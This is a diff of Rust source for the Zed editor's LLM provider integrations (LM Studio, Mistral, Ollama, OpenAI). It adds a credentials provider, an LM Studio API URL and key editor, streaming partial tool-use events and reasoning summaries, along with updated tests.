+ + let fs = ::global(cx); + update_settings_file(fs, cx, |settings, _cx| { + if let Some(settings) = settings + .language_models + .as_mut() + .and_then(|models| models.lmstudio.as_mut()) + { + 
settings.api_url = Some(LMSTUDIO_API_URL.into()); + } + }); + cx.notify(); + } + + fn render_api_url_editor(&self, cx: &Context) -> impl IntoElement { + let api_url = LmStudioLanguageModelProvider::api_url(cx); + let custom_api_url_set = api_url != LMSTUDIO_API_URL; + + if custom_api_url_set { + h_flex() + .p_3() + .justify_between() + .rounded_md() + .border_1() + .border_color(cx.theme().colors().border) + .bg(cx.theme().colors().elevated_surface_background) + .child( + h_flex() + .gap_2() + .child(Icon::new(IconName::Check).color(Color::Success)) + .child(v_flex().gap_1().child(Label::new(api_url))), + ) + .child( + Button::new("reset-api-url", "Reset API URL") + .label_size(LabelSize::Small) + .start_icon(Icon::new(IconName::Undo).size(IconSize::Small)) + .layer(ElevationIndex::ModalSurface) + .on_click( + cx.listener(|this, _, _window, cx| this.reset_api_url(_window, cx)), + ), + ) + .into_any_element() + } else { + v_flex() + .on_action(cx.listener(|this, _: &menu::Confirm, _window, cx| { + this.save_api_url(cx); + cx.notify(); + })) + .gap_2() + .child(self.api_url_editor.clone()) + .into_any_element() + } + } + + fn render_api_key_editor(&self, cx: &Context) -> impl IntoElement { + let state = self.state.read(cx); + let env_var_set = state.api_key_state.is_from_env_var(); + let configured_card_label = if env_var_set { + format!("API key set in {API_KEY_ENV_VAR_NAME} environment variable.") + } else { + "API key configured".to_string() + }; + + if !state.api_key_state.has_key() { + v_flex() + .on_action(cx.listener(Self::save_api_key)) + .child(self.api_key_editor.clone()) + .child( + Label::new(format!( + "You can also set the {API_KEY_ENV_VAR_NAME} environment variable and restart Zed." 
+ )) + .size(LabelSize::Small) + .color(Color::Muted), + ) + .into_any_element() + } else { + ConfiguredApiCard::new(configured_card_label) + .disabled(env_var_set) + .on_click(cx.listener(|this, _, _window, cx| this.reset_api_key(_window, cx))) + .when(env_var_set, |this| { + this.tooltip_label(format!( + "To reset your API key, unset the {API_KEY_ENV_VAR_NAME} environment variable." + )) + }) + .into_any_element() + } } } @@ -672,15 +903,13 @@ impl Render for ConfigurationView { fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { let is_authenticated = self.state.read(cx).is_authenticated(); - let lmstudio_intro = "Run local LLMs like Llama, Phi, and Qwen."; - - if self.loading_models_task.is_some() { - div().child(Label::new("Loading models...")).into_any() - } else { - v_flex() - .gap_2() - .child( - v_flex().gap_1().child(Label::new(lmstudio_intro)).child( + v_flex() + .gap_2() + .child( + v_flex() + .gap_1() + .child(Label::new("Run local LLMs like Llama, Phi, and Qwen.")) + .child( List::new() .child(ListBulletItem::new( "LM Studio needs to be running with at least one model downloaded.", @@ -690,86 +919,106 @@ impl Render for ConfigurationView { .child(Label::new("To get your first model, try running")) .child(Label::new("lms get qwen2.5-coder-7b").inline_code(cx)), ), - ), - ) - .child( - h_flex() - .w_full() - .justify_between() - .gap_2() - .child( - h_flex() - .w_full() - .gap_2() - .map(|this| { - if is_authenticated { - this.child( - Button::new("lmstudio-site", "LM Studio") - .style(ButtonStyle::Subtle) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .on_click(move |_, _window, cx| { - cx.open_url(LMSTUDIO_SITE) - }) - .into_any_element(), - ) - } else { - this.child( - Button::new( - "download_lmstudio_button", - "Download LM Studio", - ) + ) + .child(Label::new( + "Alternatively, you can connect to an LM Studio server by specifying its \ + URL and API key (may not be 
required):", + )), + ) + .child(self.render_api_url_editor(cx)) + .child(self.render_api_key_editor(cx)) + .child( + h_flex() + .w_full() + .justify_between() + .gap_2() + .child( + h_flex() + .w_full() + .gap_2() + .map(|this| { + if is_authenticated { + this.child( + Button::new("lmstudio-site", "LM Studio") .style(ButtonStyle::Subtle) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(move |_, _window, cx| { - cx.open_url(LMSTUDIO_DOWNLOAD_URL) + cx.open_url(LMSTUDIO_SITE) }) .into_any_element(), + ) + } else { + this.child( + Button::new( + "download_lmstudio_button", + "Download LM Studio", ) - } - }) - .child( - Button::new("view-models", "Model Catalog") .style(ButtonStyle::Subtle) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(move |_, _window, cx| { - cx.open_url(LMSTUDIO_CATALOG_URL) - }), - ), - ) - .map(|this| { - if is_authenticated { - this.child( - ButtonLike::new("connected") - .disabled(true) - .cursor_style(gpui::CursorStyle::Arrow) - .child( - h_flex() - .gap_2() - .child(Indicator::dot().color(Color::Success)) - .child(Label::new("Connected")) - .into_any_element(), - ), - ) - } else { - this.child( - Button::new("retry_lmstudio_models", "Connect") - .icon_position(IconPosition::Start) - .icon_size(IconSize::XSmall) - .icon(IconName::PlayFilled) - .on_click(cx.listener(move |this, _, _window, cx| { - this.retry_connection(cx) - })), - ) - } - }), - ) - .into_any() - } + cx.open_url(LMSTUDIO_DOWNLOAD_URL) + }) + .into_any_element(), + ) + } + }) + .child( + Button::new("view-models", "Model Catalog") + .style(ButtonStyle::Subtle) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) + .on_click(move 
|_, _window, cx| { + cx.open_url(LMSTUDIO_CATALOG_URL) + }), + ), + ) + .map(|this| { + if is_authenticated { + this.child( + ButtonLike::new("connected") + .disabled(true) + .cursor_style(CursorStyle::Arrow) + .child( + h_flex() + .gap_2() + .child(Icon::new(IconName::Check).color(Color::Success)) + .child(Label::new("Connected")) + .into_any_element(), + ) + .child( + IconButton::new("refresh-models", IconName::RotateCcw) + .tooltip(Tooltip::text("Refresh Models")) + .on_click(cx.listener(|this, _, _window, cx| { + this.state.update(cx, |state, _| { + state.available_models.clear(); + }); + this.retry_connection(_window, cx); + })), + ), + ) + } else { + this.child( + Button::new("retry_lmstudio_models", "Connect") + .start_icon( + Icon::new(IconName::PlayFilled).size(IconSize::XSmall), + ) + .on_click(cx.listener(move |this, _, _window, cx| { + this.retry_connection(_window, cx) + })), + ) + } + }), + ) } } diff --git a/crates/language_models/src/provider/mistral.rs b/crates/language_models/src/provider/mistral.rs index 02d46dcaa7ce7acc76d85c93cad610a7d2489bf0..4cd1375fe50cd792a3a7bc8c85ba7b5b5af9520a 100644 --- a/crates/language_models/src/provider/mistral.rs +++ b/crates/language_models/src/provider/mistral.rs @@ -1,5 +1,6 @@ use anyhow::{Result, anyhow}; use collections::BTreeMap; +use credentials_provider::CredentialsProvider; use futures::{FutureExt, Stream, StreamExt, future::BoxFuture, stream::BoxStream}; use gpui::{AnyView, App, AsyncApp, Context, Entity, Global, SharedString, Task, Window}; @@ -22,7 +23,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; use ui_input::InputField; use util::ResultExt; -use crate::provider::util::parse_tool_arguments; +use crate::provider::util::{fix_streamed_json, parse_tool_arguments}; const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("mistral"); const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("Mistral"); @@ -43,6 +44,7 @@ pub struct 
MistralLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, } impl State { @@ -51,15 +53,26 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = MistralLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = MistralLanguageModelProvider::api_url(cx); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } @@ -73,20 +86,30 @@ impl MistralLanguageModelProvider { .map(|this| &this.0) } - pub fn global(http_client: Arc, cx: &mut App) -> Arc { + pub fn global( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Arc { if let Some(this) = cx.try_global::() { return this.0.clone(); } let state = cx.new(|cx| { cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); let api_url = Self::api_url(cx); - this.api_key_state - .handle_url_change(api_url, |this| &mut this.api_key_state, cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.notify(); }) .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }); @@ -280,6 +303,10 @@ impl LanguageModel for MistralLanguageModel { self.model.supports_tools() } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_tool_choice(&self, _choice: LanguageModelToolChoice) -> bool { 
self.model.supports_tools() } @@ -508,6 +535,13 @@ pub fn into_mistral( model: model.id().to_string(), messages, stream, + stream_options: if stream { + Some(mistral::StreamOptions { + stream_tool_calls: Some(true), + }) + } else { + None + }, max_tokens: max_output_tokens, temperature: request.temperature, response_format: None, @@ -616,12 +650,16 @@ impl MistralEventMapper { for tool_call in tool_calls { let entry = self.tool_calls_by_index.entry(tool_call.index).or_default(); - if let Some(tool_id) = tool_call.id.clone() { + if let Some(tool_id) = tool_call.id.clone() + && !tool_id.is_empty() + { entry.id = tool_id; } if let Some(function) = tool_call.function.as_ref() { - if let Some(name) = function.name.clone() { + if let Some(name) = function.name.clone() + && !name.is_empty() + { entry.name = name; } @@ -629,6 +667,23 @@ impl MistralEventMapper { entry.arguments.push_str(&arguments); } } + + if !entry.id.is_empty() && !entry.name.is_empty() { + if let Ok(input) = serde_json::from_str::( + &fix_streamed_json(&entry.arguments), + ) { + events.push(Ok(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: entry.id.clone().into(), + name: entry.name.as_str().into(), + is_input_complete: false, + input, + raw_input: entry.arguments.clone(), + thought_signature: None, + }, + ))); + } + } } } diff --git a/crates/language_models/src/provider/ollama.rs b/crates/language_models/src/provider/ollama.rs index 96343ec060e13ff4e63bbdf96db3b2501e32a461..49c326683a225bf73f604a584307ea1316a710c4 100644 --- a/crates/language_models/src/provider/ollama.rs +++ b/crates/language_models/src/provider/ollama.rs @@ -1,4 +1,5 @@ use anyhow::{Result, anyhow}; +use credentials_provider::CredentialsProvider; use fs::Fs; use futures::{FutureExt, StreamExt, future::BoxFuture, stream::BoxStream}; use futures::{Stream, TryFutureExt, stream}; @@ -54,6 +55,7 @@ pub struct OllamaLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, 
http_client: Arc, fetched_models: Vec, fetch_model_task: Option>>, @@ -65,10 +67,15 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = OllamaLanguageModelProvider::api_url(cx); - let task = self - .api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx); + let task = self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); self.fetched_models.clear(); cx.spawn(async move |this, cx| { @@ -80,10 +87,14 @@ impl State { } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = OllamaLanguageModelProvider::api_url(cx); - let task = self - .api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx); + let task = self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); // Always try to fetch models - if no API key is needed (local Ollama), it will work // If API key is needed and provided, it will work @@ -157,7 +168,11 @@ impl State { } impl OllamaLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let this = Self { http_client: http_client.clone(), state: cx.new(|cx| { @@ -170,6 +185,14 @@ impl OllamaLanguageModelProvider { let url_changed = last_settings.api_url != current_settings.api_url; last_settings = current_settings.clone(); if url_changed { + let credentials_provider = this.credentials_provider.clone(); + let api_url = Self::api_url(cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); this.fetched_models.clear(); this.authenticate(cx).detach(); } @@ -184,6 +207,7 @@ impl OllamaLanguageModelProvider { fetched_models: 
Default::default(), fetch_model_task: None, api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }), }; @@ -400,7 +424,14 @@ impl OllamaLanguageModel { stream: true, options: Some(ChatOptions { num_ctx: Some(self.model.max_tokens), - stop: Some(request.stop), + // Only send stop tokens if explicitly provided. When empty/None, + // Ollama will use the model's default stop tokens from its Modelfile. + // Sending an empty array would override and disable the defaults. + stop: if request.stop.is_empty() { + None + } else { + Some(request.stop) + }, temperature: request.temperature.or(Some(1.0)), ..Default::default() }), @@ -858,9 +889,7 @@ impl ConfigurationView { .child( Button::new("reset-context-window", "Reset") .label_size(LabelSize::Small) - .icon(IconName::Undo) - .icon_size(IconSize::Small) - .icon_position(IconPosition::Start) + .start_icon(Icon::new(IconName::Undo).size(IconSize::Small)) .layer(ElevationIndex::ModalSurface) .on_click( cx.listener(|this, _, window, cx| { @@ -905,9 +934,7 @@ impl ConfigurationView { .child( Button::new("reset-api-url", "Reset API URL") .label_size(LabelSize::Small) - .icon(IconName::Undo) - .icon_size(IconSize::Small) - .icon_position(IconPosition::Start) + .start_icon(Icon::new(IconName::Undo).size(IconSize::Small)) .layer(ElevationIndex::ModalSurface) .on_click( cx.listener(|this, _, window, cx| this.reset_api_url(window, cx)), @@ -949,9 +976,11 @@ impl Render for ConfigurationView { this.child( Button::new("ollama-site", "Ollama") .style(ButtonStyle::Subtle) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::XSmall) + .color(Color::Muted), + ) .on_click(move |_, _, cx| cx.open_url(OLLAMA_SITE)) .into_any_element(), ) @@ -959,9 +988,11 @@ impl Render for ConfigurationView { this.child( Button::new("download_ollama_button", "Download Ollama") .style(ButtonStyle::Subtle) 
- .icon(IconName::ArrowUpRight) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::XSmall) + .color(Color::Muted), + ) .on_click(move |_, _, cx| { cx.open_url(OLLAMA_DOWNLOAD_URL) }) @@ -972,9 +1003,11 @@ impl Render for ConfigurationView { .child( Button::new("view-models", "View All Models") .style(ButtonStyle::Subtle) - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::XSmall) + .color(Color::Muted), + ) .on_click(move |_, _, cx| cx.open_url(OLLAMA_LIBRARY_URL)), ), ) @@ -1005,9 +1038,9 @@ impl Render for ConfigurationView { } else { this.child( Button::new("retry_ollama_models", "Connect") - .icon_position(IconPosition::Start) - .icon_size(IconSize::XSmall) - .icon(IconName::PlayOutlined) + .start_icon( + Icon::new(IconName::PlayOutlined).size(IconSize::XSmall), + ) .on_click(cx.listener(move |this, _, window, cx| { this.retry_connection(window, cx) })), diff --git a/crates/language_models/src/provider/open_ai.rs b/crates/language_models/src/provider/open_ai.rs index 7fb65df0a534c7600f7315fd85d7adda0d66314a..6a2313487f4a1922cdc2aa20d23ede01c4b7d158 100644 --- a/crates/language_models/src/provider/open_ai.rs +++ b/crates/language_models/src/provider/open_ai.rs @@ -1,5 +1,6 @@ use anyhow::{Result, anyhow}; use collections::{BTreeMap, HashMap}; +use credentials_provider::CredentialsProvider; use futures::Stream; use futures::{FutureExt, StreamExt, future::BoxFuture}; use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; @@ -9,14 +10,14 @@ use language_model::{ LanguageModelCompletionEvent, LanguageModelId, LanguageModelImage, LanguageModelName, LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, LanguageModelRequest, LanguageModelRequestMessage, - LanguageModelToolChoice, LanguageModelToolResult, 
LanguageModelToolResultContent, - LanguageModelToolUse, LanguageModelToolUseId, MessageContent, RateLimiter, Role, StopReason, - TokenUsage, env_var, + LanguageModelToolChoice, LanguageModelToolResultContent, LanguageModelToolUse, + LanguageModelToolUseId, MessageContent, OPEN_AI_PROVIDER_ID, OPEN_AI_PROVIDER_NAME, + RateLimiter, Role, StopReason, TokenUsage, env_var, }; use menu; use open_ai::responses::{ - ResponseFunctionCallItem, ResponseFunctionCallOutputItem, ResponseInputContent, - ResponseInputItem, ResponseMessageItem, + ResponseFunctionCallItem, ResponseFunctionCallOutputContent, ResponseFunctionCallOutputItem, + ResponseInputContent, ResponseInputItem, ResponseMessageItem, }; use open_ai::{ ImageUrl, Model, OPEN_AI_API_URL, ReasoningEffort, ResponseStreamEvent, @@ -34,10 +35,10 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; use ui_input::InputField; use util::ResultExt; -use crate::provider::util::parse_tool_arguments; +use crate::provider::util::{fix_streamed_json, parse_tool_arguments}; -const PROVIDER_ID: LanguageModelProviderId = language_model::OPEN_AI_PROVIDER_ID; -const PROVIDER_NAME: LanguageModelProviderName = language_model::OPEN_AI_PROVIDER_NAME; +const PROVIDER_ID: LanguageModelProviderId = OPEN_AI_PROVIDER_ID; +const PROVIDER_NAME: LanguageModelProviderName = OPEN_AI_PROVIDER_NAME; const API_KEY_ENV_VAR_NAME: &str = "OPENAI_API_KEY"; static API_KEY_ENV_VAR: LazyLock = env_var!(API_KEY_ENV_VAR_NAME); @@ -55,6 +56,7 @@ pub struct OpenAiLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, } impl State { @@ -63,30 +65,51 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = OpenAiLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| 
&mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = OpenAiLanguageModelProvider::api_url(cx); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } impl OpenAiLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); let api_url = Self::api_url(cx); - this.api_key_state - .handle_url_change(api_url, |this| &mut this.api_key_state, cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.notify(); }) .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }); @@ -310,6 +333,8 @@ impl LanguageModel for OpenAiLanguageModel { | Model::FivePointTwo | Model::FivePointTwoCodex | Model::FivePointThreeCodex + | Model::FivePointFour + | Model::FivePointFourPro | Model::O1 | Model::O3 => true, Model::ThreePointFiveTurbo @@ -328,6 +353,10 @@ impl LanguageModel for OpenAiLanguageModel { } } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_thinking(&self) -> bool { self.model.reasoning_effort().is_some() } @@ -500,12 +529,16 @@ pub fn into_open_ai( model: model_id.into(), messages, stream, + stream_options: if stream { + Some(open_ai::StreamOptions::default()) + } else { + None + }, stop: request.stop, temperature: request.temperature.or(Some(1.0)), max_completion_tokens: max_output_tokens, parallel_tool_calls: if supports_parallel_tool_calls && !request.tools.is_empty() { - // Disable 
parallel tool calls, as the Agent currently expects a maximum of one per turn. - Some(false) + Some(supports_parallel_tool_calls) } else { None }, @@ -596,7 +629,10 @@ pub fn into_open_ai_response( } else { None }, - reasoning: reasoning_effort.map(|effort| open_ai::responses::ReasoningConfig { effort }), + reasoning: reasoning_effort.map(|effort| open_ai::responses::ReasoningConfig { + effort, + summary: Some(open_ai::responses::ReasoningSummaryMode::Auto), + }), } } @@ -633,7 +669,18 @@ fn append_message_to_response_items( input_items.push(ResponseInputItem::FunctionCallOutput( ResponseFunctionCallOutputItem { call_id: tool_result.tool_use_id.to_string(), - output: tool_result_output(&tool_result), + output: match tool_result.content { + LanguageModelToolResultContent::Text(text) => { + ResponseFunctionCallOutputContent::Text(text.to_string()) + } + LanguageModelToolResultContent::Image(image) => { + ResponseFunctionCallOutputContent::List(vec![ + ResponseInputContent::Image { + image_url: image.to_base64_url(), + }, + ]) + } + }, }, )); } @@ -701,21 +748,6 @@ fn flush_response_parts( parts.clear(); } -fn tool_result_output(result: &LanguageModelToolResult) -> String { - if let Some(output) = &result.output { - match output { - serde_json::Value::String(text) => text.clone(), - serde_json::Value::Null => String::new(), - _ => output.to_string(), - } - } else { - match &result.content { - LanguageModelToolResultContent::Text(text) => text.to_string(), - LanguageModelToolResultContent::Image(image) => image.to_base64_url(), - } - } -} - fn add_message_content_part( new_part: open_ai::MessagePart, role: Role, @@ -824,6 +856,23 @@ impl OpenAiEventMapper { entry.arguments.push_str(&arguments); } } + + if !entry.id.is_empty() && !entry.name.is_empty() { + if let Ok(input) = serde_json::from_str::( + &fix_streamed_json(&entry.arguments), + ) { + events.push(Ok(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: entry.id.clone().into(), + name: 
entry.name.as_str().into(), + is_input_complete: false, + input, + raw_input: entry.arguments.clone(), + thought_signature: None, + }, + ))); + } + } } } } @@ -940,10 +989,20 @@ impl OpenAiResponseEventMapper { self.function_calls_by_item.insert(item_id, entry); } } - ResponseOutputItem::Unknown => {} + ResponseOutputItem::Reasoning(_) | ResponseOutputItem::Unknown => {} } events } + ResponsesStreamEvent::ReasoningSummaryTextDelta { delta, .. } => { + if delta.is_empty() { + Vec::new() + } else { + vec![Ok(LanguageModelCompletionEvent::Thinking { + text: delta, + signature: None, + })] + } + } ResponsesStreamEvent::OutputTextDelta { delta, .. } => { if delta.is_empty() { Vec::new() @@ -954,6 +1013,20 @@ impl OpenAiResponseEventMapper { ResponsesStreamEvent::FunctionCallArgumentsDelta { item_id, delta, .. } => { if let Some(entry) = self.function_calls_by_item.get_mut(&item_id) { entry.arguments.push_str(&delta); + if let Ok(input) = serde_json::from_str::( + &fix_streamed_json(&entry.arguments), + ) { + return vec![Ok(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: LanguageModelToolUseId::from(entry.call_id.clone()), + name: entry.name.clone(), + is_input_complete: false, + input, + raw_input: entry.arguments.clone(), + thought_signature: None, + }, + ))]; + } } Vec::new() } @@ -1034,14 +1107,26 @@ impl OpenAiResponseEventMapper { } ResponsesStreamEvent::Error { error } | ResponsesStreamEvent::GenericError { error } => { - vec![Err(LanguageModelCompletionError::Other(anyhow!(format!( - "{error:?}" - ))))] + vec![Err(LanguageModelCompletionError::Other(anyhow!( + error.message + )))] + } + ResponsesStreamEvent::ReasoningSummaryPartAdded { summary_index, .. } => { + if summary_index > 0 { + vec![Ok(LanguageModelCompletionEvent::Thinking { + text: "\n\n".to_string(), + signature: None, + })] + } else { + Vec::new() + } } - ResponsesStreamEvent::OutputTextDone { .. } => Vec::new(), - ResponsesStreamEvent::OutputItemDone { .. 
} + ResponsesStreamEvent::OutputTextDone { .. } + | ResponsesStreamEvent::OutputItemDone { .. } | ResponsesStreamEvent::ContentPartAdded { .. } | ResponsesStreamEvent::ContentPartDone { .. } + | ResponsesStreamEvent::ReasoningSummaryTextDone { .. } + | ResponsesStreamEvent::ReasoningSummaryPartDone { .. } | ResponsesStreamEvent::Created { .. } | ResponsesStreamEvent::InProgress { .. } | ResponsesStreamEvent::Unknown => Vec::new(), @@ -1182,13 +1267,13 @@ pub fn count_open_ai_tokens( | Model::FiveCodex | Model::FiveMini | Model::FiveNano => tiktoken_rs::num_tokens_from_messages(model.id(), &messages), - // GPT-5.1, 5.2, 5.2-codex, and 5.3-codex don't have dedicated tiktoken support; use gpt-5 tokenizer + // GPT-5.1, 5.2, 5.2-codex, 5.3-codex, 5.4, and 5.4-pro don't have dedicated tiktoken support; use gpt-5 tokenizer Model::FivePointOne | Model::FivePointTwo | Model::FivePointTwoCodex - | Model::FivePointThreeCodex => { - tiktoken_rs::num_tokens_from_messages("gpt-5", &messages) - } + | Model::FivePointThreeCodex + | Model::FivePointFour + | Model::FivePointFourPro => tiktoken_rs::num_tokens_from_messages("gpt-5", &messages), } .map(|tokens| tokens as u64) }) @@ -1353,9 +1438,11 @@ impl Render for ConfigurationView { ) .child( Button::new("docs", "Learn More") - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(move |_, _window, cx| { cx.open_url("https://zed.dev/docs/ai/llm-providers#openai-api-compatible") }), @@ -1377,10 +1464,13 @@ impl Render for ConfigurationView { mod tests { use futures::{StreamExt, executor::block_on}; use gpui::TestAppContext; - use language_model::{LanguageModelRequestMessage, LanguageModelRequestTool}; + use language_model::{ + LanguageModelRequestMessage, LanguageModelRequestTool, LanguageModelToolResult, + }; use open_ai::responses::{ - ResponseFunctionToolCall, ResponseOutputItem, 
ResponseOutputMessage, ResponseStatusDetails, - ResponseSummary, ResponseUsage, StreamEvent as ResponsesStreamEvent, + ReasoningSummaryPart, ResponseFunctionToolCall, ResponseOutputItem, ResponseOutputMessage, + ResponseReasoningItem, ResponseStatusDetails, ResponseSummary, ResponseUsage, + StreamEvent as ResponsesStreamEvent, }; use pretty_assertions::assert_eq; use serde_json::json; @@ -1622,7 +1712,7 @@ mod tests { { "type": "function_call_output", "call_id": "call-42", - "output": "{\"forecast\":\"Sunny\"}" + "output": "Sunny" } ], "stream": true, @@ -1638,7 +1728,7 @@ mod tests { } ], "prompt_cache_key": "thread-123", - "reasoning": { "effort": "low" } + "reasoning": { "effort": "low", "summary": "auto" } }); assert_eq!(serialized, expected); @@ -1670,19 +1760,30 @@ mod tests { ]; let mapped = map_response_events(events); + assert_eq!(mapped.len(), 3); + // First event is the partial tool use (from FunctionCallArgumentsDelta) assert!(matches!( mapped[0], + LanguageModelCompletionEvent::ToolUse(LanguageModelToolUse { + is_input_complete: false, + .. + }) + )); + // Second event is the complete tool use (from FunctionCallArgumentsDone) + assert!(matches!( + mapped[1], LanguageModelCompletionEvent::ToolUse(LanguageModelToolUse { ref id, ref name, ref raw_input, + is_input_complete: true, .. }) if id.to_string() == "call_123" && name.as_ref() == "get_weather" && raw_input == "{\"city\":\"Boston\"}" )); assert!(matches!( - mapped[1], + mapped[2], LanguageModelCompletionEvent::Stop(StopReason::ToolUse) )); } @@ -1878,13 +1979,27 @@ mod tests { ]; let mapped = map_response_events(events); + assert_eq!(mapped.len(), 3); + // First event is the partial tool use (from FunctionCallArgumentsDelta) assert!(matches!( mapped[0], - LanguageModelCompletionEvent::ToolUse(LanguageModelToolUse { ref raw_input, .. }) - if raw_input == "{\"city\":\"Boston\"}" + LanguageModelCompletionEvent::ToolUse(LanguageModelToolUse { + is_input_complete: false, + .. 
+ }) )); + // Second event is the complete tool use (from the Incomplete response output) assert!(matches!( mapped[1], + LanguageModelCompletionEvent::ToolUse(LanguageModelToolUse { + ref raw_input, + is_input_complete: true, + .. + }) + if raw_input == "{\"city\":\"Boston\"}" + )); + assert!(matches!( + mapped[2], LanguageModelCompletionEvent::Stop(StopReason::MaxTokens) )); } @@ -1976,4 +2091,242 @@ mod tests { LanguageModelCompletionEvent::Stop(StopReason::ToolUse) )); } + + #[test] + fn responses_stream_emits_partial_tool_use_events() { + let events = vec![ + ResponsesStreamEvent::OutputItemAdded { + output_index: 0, + sequence_number: None, + item: ResponseOutputItem::FunctionCall(ResponseFunctionToolCall { + id: Some("item_fn".to_string()), + status: Some("in_progress".to_string()), + name: Some("get_weather".to_string()), + call_id: Some("call_abc".to_string()), + arguments: String::new(), + }), + }, + ResponsesStreamEvent::FunctionCallArgumentsDelta { + item_id: "item_fn".into(), + output_index: 0, + delta: "{\"city\":\"Bos".into(), + sequence_number: None, + }, + ResponsesStreamEvent::FunctionCallArgumentsDelta { + item_id: "item_fn".into(), + output_index: 0, + delta: "ton\"}".into(), + sequence_number: None, + }, + ResponsesStreamEvent::FunctionCallArgumentsDone { + item_id: "item_fn".into(), + output_index: 0, + arguments: "{\"city\":\"Boston\"}".into(), + sequence_number: None, + }, + ResponsesStreamEvent::Completed { + response: ResponseSummary::default(), + }, + ]; + + let mapped = map_response_events(events); + // Two partial events + one complete event + Stop + assert!(mapped.len() >= 3); + + // The last complete ToolUse event should have is_input_complete: true + let complete_tool_use = mapped.iter().find(|e| { + matches!( + e, + LanguageModelCompletionEvent::ToolUse(LanguageModelToolUse { + is_input_complete: true, + .. 
